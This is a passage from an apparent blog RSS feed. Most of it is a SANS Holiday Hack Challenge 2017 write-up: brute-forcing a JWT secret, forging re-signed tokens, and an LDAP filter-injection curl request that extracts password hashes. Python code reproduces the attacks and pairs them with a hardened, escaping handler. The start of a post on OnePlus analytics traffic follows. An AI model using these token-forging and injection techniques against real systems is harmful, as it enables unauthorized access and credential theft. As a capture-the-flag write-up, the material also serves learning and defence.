&lt;p&gt;We can now take the JWT and attempt to recover the secret used to compute its HMAC-SHA256 signature. First we try the obvious: checking whether their JWT validation accepts a token whose header specifies the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;none&lt;/code&gt; algorithm (it does not). After trying and failing to get John the Ripper to do the hard work for us (apparently it is broken on the rolling Kali distribution for this task, even after converting the JWT into a John-friendly format), we resort to &lt;a href=&quot;https://github.com/brendan-rius/c-jwt-cracker&quot;&gt;a JWT cracker on GitHub&lt;/a&gt; which does a naive brute force over a given character set, up to a maximum length, across the keyspace.&lt;/p&gt;

&lt;p&gt;After a few tens of minutes, the compiled &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;jwtcrack&lt;/code&gt; binary turns up the secret &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;3lv3s&lt;/code&gt;. Using it, we can re-sign this JWT with its expiry date extended into the future.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I

Secret is &quot;3lv3s&quot;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
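&lt;p&gt;As an added example, not part of the original write-up, the following Python reimplements the three steps above: the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;alg=none&lt;/code&gt; probe, the brute force that jwtcrack performs, and re-signing the claims with a later expiry. The claims are those decoded from the stolen token; the signature is recomputed locally with the recovered secret so the example is self-contained, and the alphabet handed to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;crack_hs256&lt;/code&gt; is deliberately tiny so the search finishes in milliseconds (jwtcrack’s default alphabet is what makes the real search take minutes). The function names are this example’s own.&lt;/p&gt;

```python
import base64
import hashlib
import hmac
import itertools
import json
from typing import Optional

# Claims decoded from the stolen token on the page. "expires" is the Elf Database's own
# claim (a string); standard JWTs carry a numeric "exp" that libraries check for you.
HEADER = {"alg": "HS256", "typ": "JWT"}
CLAIMS = {"dept": "Engineering", "ou": "elf",
          "expires": "2017-08-16 12:00:47.248093+00:00", "uid": "alabaster.snowball"}
SECRET = "3lv3s"   # the secret jwtcrack recovered; used here to mint a local copy of the token


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _unb64url(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _compact_json(obj: dict) -> bytes:
    return json.dumps(obj, separators=(",", ":")).encode("utf-8")


def sign_hs256(header: dict, claims: dict, secret: str) -> str:
    """header.claims.HMAC-SHA256(secret, header.claims), each part base64url without padding."""
    signing_input = _b64url(_compact_json(header)) + "." + _b64url(_compact_json(claims))
    tag = hmac.new(secret.encode("utf-8"), signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + _b64url(tag)


def verify_hs256(token: str, secret: str) -> Optional[dict]:
    """Return the claims only if the header pins HS256 and the tag matches. Refusing every
    other 'alg' (including 'none') is the check the page reports the Elf Database passing."""
    try:
        head, body, sig = token.split(".")
    except ValueError:
        return None
    if json.loads(_unb64url(head)).get("alg") != "HS256":
        return None
    expected = hmac.new(secret.encode("utf-8"), (head + "." + body).encode("ascii"),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _unb64url(sig)):
        return None
    return json.loads(_unb64url(body))


def forge_alg_none(token: str) -> str:
    """The 'none' probe the page tried first: same claims, alg switched, empty signature."""
    _, body, _ = token.split(".")
    return _b64url(_compact_json({"alg": "none", "typ": "JWT"})) + "." + body + "."


def crack_hs256(token: str, alphabet: str, max_len: int) -> Optional[str]:
    """Naive keyspace search, the same idea as jwtcrack: try every string over the alphabet
    up to max_len characters until one reproduces the tag."""
    head, body, sig = token.split(".")
    message, target = (head + "." + body).encode("ascii"), _unb64url(sig)
    for length in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            candidate = "".join(combo)
            if hmac.new(candidate.encode("utf-8"), message, hashlib.sha256).digest() == target:
                return candidate
    return None


def forge_with_expiry(token: str, secret: str, new_expires: str) -> str:
    """Re-sign the stolen claims with the recovered secret and a later expiry."""
    head, body, _ = token.split(".")
    claims = dict(json.loads(_unb64url(body)), expires=new_expires)
    return sign_hs256(json.loads(_unb64url(head)), claims, secret)


if __name__ == "__main__":
    stolen = sign_hs256(HEADER, CLAIMS, SECRET)
    print("alg=none accepted:", verify_hs256(forge_alg_none(stolen), SECRET) is not None)
    found = crack_hs256(stolen, "3elsv", 5)   # tiny alphabet so the search finishes instantly
    print("secret:", found)
    print("forged:", forge_with_expiry(stolen, found, "2018-08-16 12:00:47.248093+00:00"))
```

&lt;p&gt;Two things make the real attack work: a five-character secret drawn from a small alphabet, and a signing key that never rotates. With a random 256-bit secret the search in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;crack_hs256&lt;/code&gt; is hopeless whatever the alphabet, and checking a server-side expiry against the claim rather than trusting the client would at least bound the damage of a leaked token.&lt;/p&gt;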

&lt;p&gt;Inserting the re-signed token into our local storage under &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;np-auth&lt;/code&gt; and refreshing the page logs us into the Elf Database as &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;alabaster.snowball&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Unfortunately, users of the Elf Database are only allowed to query it for information on elves or reindeer (see the LDAP LDIF template below, located at &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;http://edb.northpolechristmastown.com/dev/LDIF_template.txt&lt;/code&gt;, which was found via the site’s &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;robots.txt&lt;/code&gt;).&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;dn: dc=com
dc: com
objectClass: dcObject

dn: dc=northpolechristmastown,dc=com
dc: northpolechristmastown
objectClass: dcObject
objectClass: organization

dn: ou=human,dc=northpolechristmastown,dc=com
objectClass: organizationalUnit
ou: human

dn: ou=elf,dc=northpolechristmastown,dc=com
objectClass: organizationalUnit
ou: elf

dn: ou=reindeer,dc=northpolechristmastown,dc=com
objectClass: organizationalUnit
ou: reindeer

dn: cn= ,ou= ,dc=northpolechristmastown,dc=com
objectClass: addressbookPerson
cn: 
sn: 
gn: 
profilePath: /path/to/users/profile/image
uid: 
ou: 
department: 
mail: 
telephoneNumber: 
street:
postOfficeBox: 
postalCode: 
postalAddress: 
st: 
l: 
c: 
facsimileTelephoneNumber: 
description: 
userPassword: 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Noticing that the search form’s parameters may be inserted directly into an LDAP search filter, and combining this with the very helpful blog post &lt;a href=&quot;https://pen-testing.sans.org/blog/2017/11/27/understanding-and-exploiting-web-based-ldap&quot;&gt;Understanding and Exploiting Web-based LDAP&lt;/a&gt;, we see two weaknesses: the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;name&lt;/code&gt; value is spliced into the filter unescaped, so closing the clause it sits in and adding &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;(department=*)&lt;/code&gt; (a presence filter that matches every object in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dc=northpolechristmastown,dc=com&lt;/code&gt; regardless of its &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ou&lt;/code&gt;) changes the structure of the query, and the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;attributes&lt;/code&gt; parameter is a comma-separated list we control, to which the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;userPassword&lt;/code&gt; attribute can simply be appended. Putting both together, we craft the following request&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;curl &quot;http://edb.northpolechristmastown.com:4003/search&quot; -H &quot;Host: edb.northpolechristmastown.com:4003&quot; -H &quot;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0&quot; -H &quot;Accept: */*&quot; -H &quot;Accept-Language: en-GB,en;q=0.5&quot; --compressed -H &quot;Referer: http://edb.northpolechristmastown.com:4003/home.html&quot; -H &quot;Content-Type: application/x-www-form-urlencoded; charset=UTF-8&quot; -H &quot;np-auth: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE4LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.gr2b8plsmw_JCKbomOUR-E7jLiSMeQ-evyYjcxCPXco&quot; -H &quot;X-Requested-With: XMLHttpRequest&quot; -H &quot;Cookie: SESSION=A4y98fFdt6n3v51cmet8&quot; -H &quot;Connection: keep-alive&quot; --data &quot;name=))(department=*)(|(cn=&amp;amp;isElf=True&amp;amp;attributes=profilePath&quot;%&quot;2Cgn&quot;%&quot;2Csn&quot;%&quot;2Cmail&quot;%&quot;2Cuid&quot;%&quot;2Cdepartment&quot;%&quot;2CtelephoneNumber&quot;%&quot;2Cdescription&quot;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;which reveals that Santa Claus’s &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;userPassword&lt;/code&gt; attribute is &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;d8b4c05a35b0513f302a85c409b4aab3&lt;/code&gt;. A quick Google search tells us that this is the unsalted MD5 hash of the string &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;001cookielips001&lt;/code&gt;, which is why a plain lookup recovers it instantly.&lt;/p&gt;
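&lt;p&gt;The mechanics of the injection, as an added example rather than the challenge’s own code. The server-side filter is not shown on the page, so the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;TEMPLATE&lt;/code&gt; below is an assumed shape that is consistent with the payload the page sends, and the directory entries are constructed. A small RFC 4515 filter parser evaluates filters against that directory, so the vulnerable handler can be run beside a hardened one that escapes the value and allow-lists the attributes a caller may request.&lt;/p&gt;

```python
import re

# Constructed sample directory (not the challenge's data): attribute names are lower-cased
# and the userPassword values are placeholders.
DIRECTORY = [
    {"uid": "alabaster.snowball", "gn": "Alabaster", "sn": "Snowball", "ou": "elf",
     "department": "Engineering", "mail": "alabaster.snowball@northpolechristmastown.com",
     "userpassword": "placeholder-hash-1"},
    {"uid": "dasher", "gn": "Dasher", "sn": "Reindeer", "ou": "reindeer",
     "department": "Sleigh", "mail": "dasher@northpolechristmastown.com",
     "userpassword": "placeholder-hash-2"},
    {"uid": "santa.claus", "gn": "Santa", "sn": "Claus", "ou": "human",
     "department": "Administration", "mail": "santa.claus@northpolechristmastown.com",
     "userpassword": "placeholder-hash-3"},
]

# Assumed shape of the Elf Database's server-side filter: the real one is not on the page,
# but this shape is consistent with the payload the page sends.
TEMPLATE = "(|(&(gn=*{name}*)(ou={ou}))(&(sn=*{name}*)(ou={ou})))"
ALLOWED_ATTRIBUTES = frozenset({"profilePath", "gn", "sn", "mail", "uid",
                                "department", "telephoneNumber", "description"})
PAYLOAD = "))(department=*)(|(cn="     # the page's injected value for the name field

_ESCAPES = {"\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\x00": "\\00"}


def escape_filter_value(value: str) -> str:
    """RFC 4515 escaping: the characters that change filter structure become \\xx hex."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def _parse(s: str, i: int):
    """Recursive-descent parser for the subset of RFC 4515 used here: &, |, ! and attr=pattern."""
    if s[i] != "(":
        raise ValueError(f"expected '(' at offset {i}")
    i += 1
    if s[i] in "&|!":
        op, kids, i = s[i], [], i + 1
        while s[i] == "(":
            kid, i = _parse(s, i)
            kids.append(kid)
        if s[i] != ")":
            raise ValueError(f"expected ')' at offset {i}")
        return (op, kids), i + 1
    close = s.index(")", i)              # a raw ')' can only be a delimiter: values escape it
    attr, _, pattern = s[i:close].partition("=")
    return ("=", attr.lower(), pattern), close + 1


def parse_filter(s: str):
    tree, end = _parse(s, 0)
    if end != len(s):
        raise ValueError("trailing characters after filter")
    return tree


def _pattern_to_regex(pattern: str):
    # Unescaped '*' is a wildcard; '\xx' escapes decode to literal characters. Matching is
    # case-insensitive, as with the caseIgnore rules most of these attributes use.
    pieces = [re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), p)
              for p in pattern.split("*")]
    return re.compile(".*".join(re.escape(p) for p in pieces), re.IGNORECASE)


def _matches(node, entry: dict) -> bool:
    if node[0] == "&":
        return all(_matches(kid, entry) for kid in node[1])
    if node[0] == "|":
        return any(_matches(kid, entry) for kid in node[1])
    if node[0] == "!":
        return not _matches(node[1][0], entry)
    _, attr, pattern = node
    value = entry.get(attr)
    return value is not None and _pattern_to_regex(pattern).fullmatch(value) is not None


def ldap_search(filter_str: str, attributes: list) -> list:
    """Evaluate a filter over DIRECTORY and project the requested attributes."""
    tree = parse_filter(filter_str)
    return [{a: e[a.lower()] for a in attributes if a.lower() in e}
            for e in DIRECTORY if _matches(tree, e)]


def vulnerable_search(name: str, is_elf: bool, attributes: str) -> list:
    """The flawed handler: raw name spliced into the filter, any attribute honoured."""
    flt = TEMPLATE.format(name=name, ou="elf" if is_elf else "reindeer")
    return ldap_search(flt, attributes.split(","))


def hardened_search(name: str, is_elf: bool, attributes: str) -> list:
    """Escape the value and allow-list the attributes a caller may ask for."""
    attrs = attributes.split(",")
    refused = sorted(set(attrs) - ALLOWED_ATTRIBUTES)
    if refused:
        raise ValueError(f"attributes not permitted: {refused}")
    flt = TEMPLATE.format(name=escape_filter_value(name), ou="elf" if is_elf else "reindeer")
    return ldap_search(flt, attrs)
```

&lt;p&gt;With the assumed template, the injected value turns the outer OR into one that contains a bare &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;(department=*)&lt;/code&gt;, so the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ou&lt;/code&gt; restriction no longer constrains anything. In real code use the LDAP library’s own escaping (for ldap3, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ldap3.utils.conv.escape_filter_chars&lt;/code&gt;) rather than a hand-rolled table, and keep &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;userPassword&lt;/code&gt; out of any attribute list a client can influence.&lt;/p&gt;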

&lt;p&gt;&lt;strong&gt;This is the answer to Question 8: Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com. Who wrote the letter?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Using this, we can log into the Elf Database as Santa Claus himself and open the Santa Panel, which reveals a message containing the following picture of a letter written by The Wizard of Oz himself&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;/images/wizard_of_oz_to_santa_d0t011d408nx.png&quot;&gt;&lt;img src=&quot;/images/wizard_of_oz_to_santa_d0t011d408nx.png&quot; alt=&quot;santa picture center&quot; /&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2 id=&quot;back-to-the-north-pole-and-beyond&quot;&gt;Back to the North Pole and Beyond&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;This is the answer to Question 9: Which character is ultimately the villain causing the giant snowball problem. What was the villain’s motive?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Completing the game puzzles, we engage in another NPC conversation where we find out who is truly behind this Christmas misery: Glinda the Good Witch. She confesses that she is responsible for casting a magic spell on the Abominable Snow Monster, in an attempt to make money from the Elf-Munchkin conflict.&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;It’s me, Glinda the Good Witch of Oz! You found me and ruined my genius plan!&lt;/p&gt;

  &lt;p&gt;You see, I cast a magic spell on the Abominable Snow Monster to make him throw all the snowballs at the North Pole. Why? Because I knew a giant snowball fight would stir up hostilities between the Elves and the Munchkins, resulting in all-out WAR between Oz and the North Pole. I was going to sell my magic and spells to both sides. War profiteering would mean GREAT business for me.&lt;/p&gt;

  &lt;p&gt;But, alas, you and your sleuthing foiled my venture. And I would have gotten away with it too, if it weren’t for you meddling kids!&lt;/p&gt;
&lt;/blockquote&gt;
</description>
        <pubDate>Wed, 10 Jan 2018 00:00:00 +0000</pubDate>
        <link>/post/sans-holiday-hack-challenge-2017/</link>
        <guid isPermaLink="true">/post/sans-holiday-hack-challenge-2017/</guid>
        
        
      </item>
    
      <item>
        <title>OnePlus OxygenOS built-in analytics</title>
        <description>&lt;hr /&gt;

&lt;h4 id=&quot;update-2017-10-10&quot;&gt;Update 2017-10-10&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;After gaining some traction online, Twitter user &lt;a href=&quot;https://twitter.com/JaCzekanski&quot;&gt;@JaCzekanski&lt;/a&gt; pointed out that there is a way to remove the OnePlus Device Manager app via adb, without requiring root (substitute &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;net.oneplus.odm&lt;/code&gt; for &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;pkg&lt;/code&gt;)&lt;/em&gt;&lt;/p&gt;

&lt;blockquote class=&quot;twitter-tweet&quot; data-lang=&quot;en&quot;&gt;&lt;p lang=&quot;en&quot; dir=&quot;ltr&quot;&gt;&lt;a href=&quot;https://twitter.com/chrisdcmoore?ref_src=twsrc%5Etfw&quot;&gt;@chrisdcmoore&lt;/a&gt; I&amp;#39;ve read your article about OnePlus Analytics. Actually, you can disable it permanently: pm uninstall -k --user 0 pkg&lt;/p&gt;&amp;mdash; Jakub Czekański (@JaCzekanski) &lt;a href=&quot;https://twitter.com/JaCzekanski/status/917691128807395328?ref_src=twsrc%5Etfw&quot;&gt;October 10, 2017&lt;/a&gt;&lt;/blockquote&gt;

&lt;hr /&gt;

&lt;p&gt;Whilst completing the &lt;a href=&quot;/post/sans-holiday-hack-challenge-2016/&quot;&gt;SANS Holiday Hack Challenge 2016&lt;/a&gt;, I had cause to proxy the internet traffic from my phone, a &lt;a href=&quot;https://oneplus.net/2&quot;&gt;OnePlus 2&lt;/a&gt;, through &lt;a href=&quot;https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project&quot;&gt;OWASP ZAP&lt;/a&gt;, a security tool for attacking web applications.&lt;/p&gt;

&lt;p&gt;Amidst the traffic, I noticed requests to a domain which I’d not seen before, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;open.oneplus.net&lt;/code&gt;, and decided to examine them a little closer.&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;/images/zap-oneplus-1.png&quot;&gt;&lt;img src=&quot;/images/zap-oneplus-1.png&quot; alt=&quot;open.oneplus.net proxied traffic&quot; /&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Our first question is what I am connecting to at &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;open.oneplus.net&lt;/code&gt;.
Obviously the domain &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;oneplus.net&lt;/code&gt; belongs to the manufacturer of the device, but what’s with the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;open&lt;/code&gt; bit?
Doing a DNS lookup, we find that this name points to an &lt;a href=&quot;https://aws.amazon.com&quot;&gt;Amazon AWS&lt;/a&gt; instance in the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;us-east-1&lt;/code&gt; region, with a mention of &lt;a href=&quot;https://hadoop.apache.org/&quot;&gt;Apache Hadoop&lt;/a&gt; in the record.&lt;/p&gt;

&lt;p&gt;So the next question is what is being sent here?
From the example screenshot, we see two requests being sent over HTTPS: the first (not pictured) sending authentication information to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/oauth/token&lt;/code&gt;, and the second, more interesting, request to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/cloud/pushdata/&lt;/code&gt; with two parameters: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;access_token&lt;/code&gt;, which is the OAuth token returned by the first request, and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;data&lt;/code&gt;, which appears to be Base64 encoded.&lt;/p&gt;

&lt;p&gt;Decoding the Base64 parameter gives us some JSON, shown below (formatting mine)&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-json&quot; data-lang=&quot;json&quot;&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
    &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;ty&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
    &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;dl&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
        &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;258cfeb1&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;en&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;screen_off&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;ts&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1484177517017&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;oed&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[],&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;it&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;rv&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;OnePlus2Oxygen_14.A.27_GLO_027_1612271635&quot;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
        &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;},&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;258cfeb1&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;en&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;screen_on&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;ts&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1484177826984&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;oed&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[],&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;it&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;rv&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;OnePlus2Oxygen_14.A.27_GLO_027_1612271635&quot;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
        &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;},&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;258cfeb1&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;en&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;unlock&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;ts&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1484177827961&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;oed&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[],&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;it&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;rv&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;OnePlus2Oxygen_14.A.27_GLO_027_1612271635&quot;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
        &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;},&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
